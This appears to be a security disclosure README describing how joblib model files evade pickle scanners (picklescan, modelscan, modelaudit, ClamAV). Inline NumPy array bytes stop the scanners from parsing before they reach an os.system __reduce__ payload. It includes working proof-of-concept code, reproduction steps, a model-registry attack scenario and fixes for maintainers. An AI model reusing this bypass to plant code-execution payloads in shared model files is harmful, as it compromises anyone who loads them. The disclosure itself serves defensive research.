init

6c5eaec verified 6 days ago

7.13 kB

Joblib Scanner Bypass via Inline NumPy Array Bytes

Summary

A malicious .joblib file containing os.system RCE achieves 0/4 scanner detection (picklescan, modelscan, modelaudit, ClamAV (local)) while executing arbitrary commands on joblib.load(). The evasion requires no payload obfuscation — the dangerous os.system global is present in plaintext opcodes — but scanners never reach it because inline raw NumPy array bytes cause a mid-stream parse failure that all scanners treat as "clean."

Affected scanners: picklescan 1.0.4, modelscan 0.8.8, modelaudit 0.2.45, ClamAV 1.5.2 Affected format: Joblib (.joblib) — uncompressed, standard format Impact: Arbitrary code execution at model load time, bypassing ProtectAI safety scan Environment: Python 3.14.5, joblib 1.5.3, numpy 2.4.6, scikit-learn 1.8.0

Vulnerability

Root Cause

joblib's NumpyPickler serializes NumPy arrays by writing raw array bytes inline in the pickle stream, between standard pickle opcodes. joblib's NumpyUnpickler knows how to skip past these bytes (it overrides the BUILD opcode handler to call wrapper.read_array() which advances the file cursor). However, pickle scanners use pickletools.genops or equivalent opcode walkers that are not aware of these inline raw bytes. When the scanner hits a raw float/int byte mid-stream, it misinterprets it as a pickle opcode, fails with a ValueError, and silently returns "clean" instead of flagging the parse failure.

If an attacker places a malicious __reduce__ object after a NumPy array in pickle traversal order, the scanner aborts before reaching the malicious opcodes. The loader processes the entire file correctly, executing the payload.

Attack Requirements

A pickle container (tuple, list, dict, or nested) serialized via joblib.dump
At least one NumPy ndarray (any dtype, ≥1 element) positioned before the malicious object in pickle traversal order
A malicious object with __reduce__ returning a dangerous callable (e.g., os.system)

Why This Is Not the Known Joblib Compression Bypass

The previously reported joblib bypass (PickleCloak Appendix B.1) involves compressed joblib files where the compression magic bytes at position 0 cause scanners to fail immediately. This bypass uses uncompressed, standard-format joblib files. The parse failure occurs mid-stream due to inline NumPy array bytes, not at the start of the file. The mechanism is fundamentally different.

Files

File	Description
`malicious_model.joblib`	PoC: fitted LinearRegression + malicious CustomLR in a tuple. 648 bytes.
`poc_generate.py`	Generates the malicious .joblib file
`poc_verify.py`	Scans with all scanners and loads to confirm RCE
`generalized_poc.py`	8 additional variants proving generalization (no sklearn needed)

Reproduction

Step 1: Install dependencies

pip install joblib numpy scikit-learn picklescan modelscan modelaudit fickling

Step 2: Generate the PoC (or use the provided `malicious_model.joblib`)

python poc_generate.py

Step 3: Scan — observe all scanners report clean

picklescan --path malicious_model.joblib
# Expected: 0 infected files, 0 dangerous globals

modelscan -p malicious_model.joblib
# Expected: No issues found

python -c "
from modelaudit.core import scan_model_directory_or_file
result = scan_model_directory_or_file('malicious_model.joblib')
print('malicious:', result.get('malicious', False))
print('verdict:', result.get('pickle_verdict', False))
"
# Expected: malicious: False, verdict: False

Step 4: Load — observe code execution

python -c "import joblib; joblib.load('malicious_model.joblib')"
# Expected output includes: This is a malicious payload!

Step 5: Verify with controls

python poc_verify.py
# Runs full matrix: bypass cases (clean) vs control cases (detected)

Scanner Results

Bypass case: `(fitted_LinearRegression, malicious_CustomLR)`

Scanner	Version	Verdict	Detects `os.system`?
picklescan	1.0.4	0 infected	No — parse aborts before reaching REDUCE
modelscan	0.8.8	No issues found	No — parse aborts silently
modelaudit	0.2.45	malicious: False	No — logs WARNING but verdict stays safe
fickling	0.1.11	LIKELY_OVERTLY_MALICIOUS	No — flags NumpyArrayWrapper (fires on ALL fitted joblib files, including benign ones)
ClamAV	1.5.2	CLEAN	No — signatures gated on ZIP/torch container

Control case: `(malicious_CustomLR, fitted_LinearRegression)` — reversed tuple order

Scanner	Version	Verdict	Detects `os.system`?
picklescan	1.0.4	Dangerous	Yes — REDUCE precedes array bytes
modelscan	0.8.8	No issues found	No — modelscan is fail-open even when dangerous global was already observed
modelaudit	0.2.45	CRITICAL	Yes — REDUCE precedes array bytes

Note: modelscan appears fail-open on parse abort regardless of prior findings. This is a separate issue.

Generalization

The bypass does NOT require scikit-learn, fitted models, or any specific container shape. Minimal example:

import numpy as np
import joblib

class Detonator:
    def __reduce__(self):
        import os
        return (os.system, ('echo PWNED',))

# Any numpy array before the malicious object triggers the bypass
joblib.dump((np.array([1.0]), Detonator()), 'minimal_bypass.joblib')

# Scanners: clean. Loader: executes 'echo PWNED'

Tested container shapes (all bypass 4/5 scanners):

(np.array([1.0]), Detonator())
[np.array([1.0, 2.0, 3.0]), Detonator()]
{"data": np.array([1.0]), "evil": Detonator()}
{"outer": (np.array([1.0]), Detonator())}
(np.zeros(10, dtype=np.int64), Detonator())

Real-World Impact

This bypass affects every fitted scikit-learn model saved with joblib.dump. A fitted model contains NumPy arrays (the learned coefficients), which produce inline raw bytes. An attacker can:

Take a legitimate fitted sklearn model
Bundle it with a malicious __reduce__ object in a tuple
Upload to HuggingFace or any model registry
ProtectAI's ModelScan reports "No issues found"
Victim downloads and calls joblib.load() → RCE

Suggested Fixes

For scanner maintainers (picklescan, modelscan, modelaudit):

Fail-closed on parse abort. Any pickletools.genops mid-stream exception should be treated as CRITICAL/suspicious, not silently clean.
Format-aware parsing. Recognize joblib.numpy_pickle.NumpyArrayWrapper in the opcode stream and consume the documented inline-bytes region instead of interpreting raw array bytes as opcodes.

For joblib maintainers:

Document the inline-bytes protocol so scanner authors can implement format-aware walkers.
Consider providing a joblib.safe_load(path, *, allowed_globals) analogous to PyTorch's weights_only=True.